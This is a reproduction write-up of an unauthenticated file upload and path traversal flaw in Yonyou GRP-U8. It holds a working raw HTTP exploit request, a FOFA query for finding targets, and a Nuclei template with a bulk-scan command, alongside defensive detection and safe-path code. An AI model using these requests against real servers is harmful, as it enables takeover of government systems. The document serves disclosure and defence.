[Vulnerability Reproduction] Yonyou GRP-U8 SmartUpload01 File Upload Vulnerability (with PoC)

admin, 2023-12-25 22:18:22






01 Vulnerability Name

Yonyou GRP-U8 SmartUpload01 file upload vulnerability


02 Affected Products

Yonyou GRP-U8



03 Vulnerability Description

Yonyou GRP-U8 Administrative and Public Institution Internal Control Management Software is an internal control management system built specifically for government and public institutions, intended to improve the efficiency and accuracy of internal control. The /u8qx/SmartUpload01.jsp endpoint of this software has a file upload vulnerability: an unauthenticated attacker can use it to upload a malicious backdoor file and thereby gain control of the server.


04 FOFA Search Query

app="用友-GRP-U8"



05 Reproduction

Send the following request to the lab target to upload the file:

POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

------WebKitFormBoundaryzhvrkrqt
Content-Disposition: form-data; name="uname"

../../../../../../../../../fljnyucrkvzycmtwbfiw
------WebKitFormBoundaryzhvrkrqt
Content-Disposition: form-data; name="input_localfile"; filename="fljnyucrkvzycmtwbfiw.pdf"

<jatools Class="jatools.ReportDocument" Name="jatools report template"><VariableContext></VariableContext><Page><Name>panel</Name><Children ItemClass="PagePanel"><Item0><Name>header</Name><Width>753</Width><Height>80</Height><Children ItemClass="Label"><Item0><Text>用一个Student对象,和其getMembers()方法,作成一个嵌套的表格dlvmwt</Text><ForeColor>-65536</ForeColor><X>41</X><Y>15</Y><Width>362</Width><Height>62</Height></Item0></Children><Type>100</Type></Item0><Item1><Name>footer</Name><Y>802</Y><Width>753</Width><Height>280</Height><Type>103</Type></Item1><Item2><Name>body</Name><Y>80</Y><Width>753</Width><Height>722</Height><Children ItemClass="Table"><Item0><NodePath>学生表</NodePath><X>115</X><Y>77</Y><Children><Item0 Class="Label"><Text>家庭成员</Text><Border/><PrintStyle>united-level:1;</PrintStyle><Cell><Row>3</Row><Col>0</Col><RowSpan>2</RowSpan></Cell></Item0><Item1 Class="Label"><Text>关系</Text><BackColor>-4144897</BackColor><Border/><Cell><Row>3</Row><Col>1</Col></Cell></Item1><Item2 Class="Label"><Text>性别</Text><BackColor>-4144897</BackColor><Border/><Cell><Row>3</Row><Col>2</Col></Cell></Item2><Item3 Class="Label"><Text>年龄</Text><BackColor>-4144897</BackColor><Border/><Cell><Row>3</Row><Col>3</Col></Cell></Item3><Item4 Class="Label"><Text>得分</Text><Border/><Cell><Row>2</Row><Col>0</Col></Cell></Item4><Item5 Class="Label"><Text>性别</Text><Border/><Cell><Row>1</Row><Col>0</Col></Cell></Item5><Item6 Class="Label"><Text>姓名</Text><Border/><Cell><Row>0</Row><Col>0</Col></Cell></Item6><Item7 Class="Text"><Variable>=$学生表</Variable><Border/><Cell><Row>0</Row><Col>1</Col><ColSpan>3</ColSpan></Cell></Item7><Item8 Class="Text"><Variable>=$学生表.value()</Variable><Border/><Cell><Row>1</Row><Col>1</Col><ColSpan>3</ColSpan></Cell></Item8><Item9 Class="Text"><Variable>=$学生表.getName()</Variable><Border/><Cell><Row>2</Row><Col>1</Col><ColSpan>3</ColSpan></Cell></Item9><Item10 Class="RowPanel"><Cell><Row>4</Row><Col>0</Col><ColSpan>4</ColSpan></Cell><Children ItemClass="Text"><Item0><Variable></Variable><Border/><Cell><Row>4</Row><Col>3</Col></Cell></Item0><Item1><Variable></Variable><Border/><Cell><Row>4</Row><Col>2</Col></Cell></Item1><Item2><Variable>;</Variable><Border/><Cell><Row>4</Row><Col>1</Col></Cell></Item2></Children><NodePath>成员</NodePath></Item10></Children><ColumnWidths>60,60,60,60</ColumnWidths><RowHeights>20,20,20,20,20</RowHeights></Item0></Children><Type>102</Type></Item2></Children></Page><NodeSource><Children ItemClass="ArrayNodeSource"><Item0><Children ItemClass="ArrayNodeSource"><Item0><TagName>成员</TagName><Expression>$.value()</Expression></Item0></Children><TagName>学生表</TagName><Expression>new Object[]{123*123}</Expression></Item0></Children></NodeSource></jatools>
------WebKitFormBoundaryzhvrkrqt--

The response is as follows. Note that the file name is echoed back with the traversal sequence intact ("nullu8qxupload../../..."): the uname value is concatenated into the storage path without any normalisation, which is why the file ends up outside the upload directory.

HTTP/1.1 200 OK
Date: Mon, 25 Dec 2023 02:08:40 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F5ABE2177546F4; Path=/; HttpOnly
Content-Type: text/html;charset=gbk
Content-Length: 311

<html> <head> <title>SmartUpload</title> </head> <body> <font color="red">图片名:../../../../../../../../../fljnyucrkvzycmtwbfiw.pdf</font><br> <h2><img src="nullu8qxupload../../../../../../../../../fljnyucrkvzycmtwbfiw.pdf" width="200" height="300"></h2> </body></html>

View the uploaded file (the report renderer evaluates the expression in the uploaded template):

http://x.x.x.x/jatoolsreport?file=/fljnyucrkvzycmtwbfiw.pdf&as=dhtml

Reproduction successful.
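For defenders, the upload request above has two traits a reverse proxy or traffic inspector can key on: a "../" sequence in a plain form field (uname) and a file declared as .pdf whose body is XML rather than a PDF. The following is an added example, not code from the original post or from the vendor: a small multipart parser plus the two checks, run over a sample body constructed from the request above (the jatools XML is shortened to its opening tag, and a benign upload is constructed for comparison).

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample: the body of the upload request from the reproduction
# section. Boundary, field names and the traversal value are the page's; the
# jatools report XML is truncated because the checks never look inside it.
SAMPLE_BOUNDARY = "----WebKitFormBoundaryzhvrkrqt"
SAMPLE_BODY = (
    "------WebKitFormBoundaryzhvrkrqt\r\n"
    'Content-Disposition: form-data; name="uname"\r\n'
    "\r\n"
    "../../../../../../../../../fljnyucrkvzycmtwbfiw\r\n"
    "------WebKitFormBoundaryzhvrkrqt\r\n"
    'Content-Disposition: form-data; name="input_localfile"; '
    'filename="fljnyucrkvzycmtwbfiw.pdf"\r\n'
    "\r\n"
    '<jatools Class="jatools.ReportDocument" Name="jatools report template">'
    "...</jatools>\r\n"
    "------WebKitFormBoundaryzhvrkrqt--\r\n"
)

# Constructed benign upload: a plain name and a body that really starts like a PDF.
BENIGN_BODY = (
    "------WebKitFormBoundaryzhvrkrqt\r\n"
    'Content-Disposition: form-data; name="uname"\r\n'
    "\r\n"
    "invoice_2023\r\n"
    "------WebKitFormBoundaryzhvrkrqt\r\n"
    'Content-Disposition: form-data; name="input_localfile"; filename="invoice_2023.pdf"\r\n'
    "\r\n"
    "%PDF-1.4\n%...\r\n"
    "------WebKitFormBoundaryzhvrkrqt--\r\n"
)

# A ".." that forms a whole path segment (start/end or between separators).
DOTDOT_SEGMENT = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def parse_multipart(body: str, boundary: str) -> List[Dict[str, str]]:
    """Minimal multipart/form-data parser, enough for inspection (not a
    general-purpose implementation): one dict per part with name, filename
    (empty for text fields) and the raw value."""
    delimiter = "--" + boundary
    parts: List[Dict[str, str]] = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith("--"):          # closing delimiter reached
            break
        chunk = chunk.lstrip("\r\n")
        headers, _, value = chunk.partition("\r\n\r\n")
        name = re.search(r'(?:^|[;\s])name="([^"]*)"', headers)
        filename = re.search(r'filename="([^"]*)"', headers)
        parts.append({
            "name": name.group(1) if name else "",
            "filename": filename.group(1) if filename else "",
            "value": value.rstrip("\r\n"),
        })
    return parts


def has_dotdot(s: str) -> bool:
    """True if s contains a '..' path segment, also in URL-encoded form."""
    return bool(DOTDOT_SEGMENT.search(unquote(s)))


def inspect_upload(body: str, boundary: str) -> List[str]:
    """Return findings for one multipart body: traversal sequences in text
    fields or file names, and a declared .pdf whose content lacks the PDF magic."""
    findings: List[str] = []
    for part in parse_multipart(body, boundary):
        if part["filename"]:
            if has_dotdot(part["filename"]) or re.search(r"[\\/]", part["filename"]):
                findings.append(f"path traversal in filename of field {part['name']!r}")
            if part["filename"].lower().endswith(".pdf") and not part["value"].startswith("%PDF"):
                findings.append(f"field {part['name']!r}: .pdf filename but content is not a PDF")
        elif has_dotdot(part["value"]):
            findings.append(f"path traversal in text field {part['name']!r}")
    return findings


if __name__ == "__main__":
    for label, body in (("sample", SAMPLE_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_upload(body, SAMPLE_BOUNDARY) or ["no findings"])
```

In a WAF or proxy rule, scope these checks to POSTs against /u8qx/SmartUpload01.jsp to keep false positives low; any hit on the uname field is a clear signal, since that field is only ever expected to carry a bare file name.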


06 Nuclei PoC

The PoC template is as follows:

id: yonyou-grp-u8-smartupload01-fileupload

info:
  name: 用友 GRP u8 SmartUpload01 文件上传漏洞
  author: fgz
  severity: critical
  description: 用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统,旨在提高内部控制的效率和准确性。该软件/u8qx/SmartUpload01.jsp接口存在文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
  metadata:
    max-request: 1
    fofa-query: app="用友-GRP-U8"
    verified: true

variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}"
  rboundary: "{{to_lower(rand_text_alpha(8))}}"

requests:
  - raw:
      - |+
        POST /u8qx/SmartUpload01.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
        Accept-Encoding: gzip

        ------WebKitFormBoundary{{rboundary}}
        Content-Disposition: form-data; name="uname"

        ../../../../../../../../../{{file_name}}
        ------WebKitFormBoundary{{rboundary}}
        Content-Disposition: form-data; name="input_localfile"; filename="{{file_name}}.pdf"

        <jatools Class="jatools.ReportDocument" Name="jatools report template"> <VariableContext> </VariableContext> <Page> <Name>panel</Name> <Children ItemClass="PagePanel"> <Item0> <Name>header</Name> <Width>753</Width> <Height>80</Height> <Children ItemClass="Label"> <Item0> <Text>用一个Student对象,和其getMembers()方法,作成一个嵌套的表格dlvmwt</Text> <ForeColor>-65536</ForeColor> <X>41</X> <Y>15</Y> <Width>362</Width> <Height>62</Height> </Item0> </Children> <Type>100</Type> </Item0> <Item1> <Name>footer</Name> <Y>802</Y> <Width>753</Width> <Height>280</Height> <Type>103</Type> </Item1> <Item2> <Name>body</Name> <Y>80</Y> <Width>753</Width> <Height>722</Height> <Children ItemClass="Table"> <Item0> <NodePath>学生表</NodePath> <X>115</X> <Y>77</Y> <Children> <Item0 Class="Label"> <Text>家庭成员</Text> <Border/> <PrintStyle>united-level:1;</PrintStyle> <Cell> <Row>3</Row> <Col>0</Col> <RowSpan>2</RowSpan> </Cell> </Item0> <Item1 Class="Label"> <Text>关系</Text> <BackColor>-4144897</BackColor> <Border/> <Cell> <Row>3</Row> <Col>1</Col> </Cell> </Item1> <Item2 Class="Label"> <Text>性别</Text> <BackColor>-4144897</BackColor> <Border/> <Cell> <Row>3</Row> <Col>2</Col> </Cell> </Item2> <Item3 Class="Label"> <Text>年龄</Text> <BackColor>-4144897</BackColor> <Border/> <Cell> <Row>3</Row> <Col>3</Col> </Cell> </Item3> <Item4 Class="Label"> <Text>得分</Text> <Border/> <Cell> <Row>2</Row> <Col>0</Col> </Cell> </Item4> <Item5 Class="Label"> <Text>性别</Text> <Border/> <Cell> <Row>1</Row> <Col>0</Col> </Cell> </Item5> <Item6 Class="Label"> <Text>姓名</Text> <Border/> <Cell> <Row>0</Row> <Col>0</Col> </Cell> </Item6> <Item7 Class="Text"> <Variable>=$学生表</Variable> <Border/> <Cell> <Row>0</Row> <Col>1</Col> <ColSpan>3</ColSpan> </Cell> </Item7> <Item8 Class="Text"> <Variable>=$学生表.value()</Variable> <Border/> <Cell> <Row>1</Row> <Col>1</Col> <ColSpan>3</ColSpan> </Cell> </Item8> <Item9 Class="Text"> <Variable>=$学生表.getName()</Variable> <Border/> <Cell> <Row>2</Row> <Col>1</Col> <ColSpan>3</ColSpan> </Cell> </Item9> <Item10 Class="RowPanel"> <Cell> <Row>4</Row> <Col>0</Col> <ColSpan>4</ColSpan> </Cell> <Children ItemClass="Text"> <Item0> <Variable></Variable> <Border/> <Cell> <Row>4</Row> <Col>3</Col> </Cell> </Item0> <Item1> <Variable></Variable> <Border/> <Cell> <Row>4</Row> <Col>2</Col> </Cell> </Item1> <Item2> <Variable>;</Variable> <Border/> <Cell> <Row>4</Row> <Col>1</Col> </Cell> </Item2> </Children> <NodePath>成员</NodePath> </Item10> </Children> <ColumnWidths>60,60,60,60</ColumnWidths> <RowHeights>20,20,20,20,20</RowHeights> </Item0> </Children> <Type>102</Type> </Item2> </Children> </Page> <NodeSource> <Children ItemClass="ArrayNodeSource"> <Item0> <Children ItemClass="ArrayNodeSource"> <Item0> <TagName>成员</TagName> <Expression>$.value()</Expression> </Item0> </Children> <TagName>学生表</TagName> <Expression>new Object[]{123*123}</Expression> </Item0> </Children> </NodeSource> </jatools>
        ------WebKitFormBoundary{{rboundary}}--

      - |
        GET /jatoolsreport?file=/{{file_name}}.pdf&as=dhtml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '15129') && contains(body_2, '<p class=')"

Run the PoC (the matcher looks for 15129, i.e. the result of the 123*123 expression in the uploaded template, in the rendered report):

nuclei.exe -t yonyou-grp-u8-smartupload01-fileupload.yaml -l 用友-GRP-U8.txt



07 Remediation

Upgrade to the latest version.
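Upgrading is the vendor-supported fix. For anyone maintaining a similar upload handler, the defect the echoed response exposes (a client-chosen name appended to the storage path with no normalisation) is worth seeing beside a fail-closed version. The following is an added example and not the vendor's code: the upload directory, the extension allow-list and the naive concatenation are assumptions that mirror the behaviour visible in the response, not the product's actual implementation.

```python
import os
from pathlib import Path

# Hypothetical upload directory; the real GRP-U8 layout is not documented here.
UPLOAD_ROOT = Path("/var/app/u8qx/upload")
# Hypothetical allow-list of what the handler is meant to accept.
ALLOWED_EXTENSIONS = (".pdf", ".png", ".jpg", ".jpeg")


def naive_upload_path(upload_root: Path, user_supplied_name: str) -> Path:
    """The 'before': the pattern the echoed response suggests, with the
    client-chosen name appended to the directory as a string. '..' segments
    walk out of the directory. Kept only for comparison (assumed, simplified)."""
    return Path(os.path.normpath(f"{upload_root}/{user_supplied_name}"))


def safe_upload_path(upload_root: Path, user_supplied_name: str) -> Path:
    """Map a client-chosen name to a path inside upload_root, failing closed.

    Rejects (rather than silently stripping) anything containing a directory
    separator, a '..' segment or a NUL byte, requires an allow-listed
    extension, and finally re-checks containment on the resolved path as
    defence in depth against anything the earlier checks missed."""
    name = user_supplied_name
    if not name or name in (".", "..") or "/" in name or "\\" in name or "\x00" in name:
        raise ValueError(f"rejected file name: {name!r}")
    if Path(name).suffix.lower() not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: {name!r}")
    root = upload_root.resolve()
    target = (root / name).resolve()
    if target.parent != root:
        raise ValueError(f"resolved path escapes upload root: {target}")
    return target


def is_inside(path: Path, root: Path) -> bool:
    """Containment check usable on its own, e.g. before serving a stored file."""
    try:
        path.resolve().relative_to(root.resolve())
        return True
    except ValueError:
        return False


def rejects(upload_root: Path, user_supplied_name: str) -> bool:
    """Convenience wrapper: True if safe_upload_path refuses the name."""
    try:
        safe_upload_path(upload_root, user_supplied_name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    traversal = "../../../../../../../../../fljnyucrkvzycmtwbfiw.pdf"
    print("naive  :", naive_upload_path(UPLOAD_ROOT, traversal))
    for candidate in ("report.pdf", traversal, "shell.jsp"):
        try:
            print("safe   :", safe_upload_path(UPLOAD_ROOT, candidate))
        except ValueError as exc:
            print("reject :", exc)
```

An extension allow-list on its own is not enough here: the PoC uploads a report template with a .pdf name, so the stored content should also be checked against the declared type, and the report renderer (/jatoolsreport in the writeup) should only read templates from a fixed, non-writable location rather than from a caller-supplied path.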


Originally published on the WeChat public account AI与网安: [Vulnerability Reproduction] Yonyou GRP-U8 SmartUpload01 File Upload Vulnerability (with PoC)

Reprint attribution (CN-SEC中文网): http://cn-sec.com/archives/2332849.html
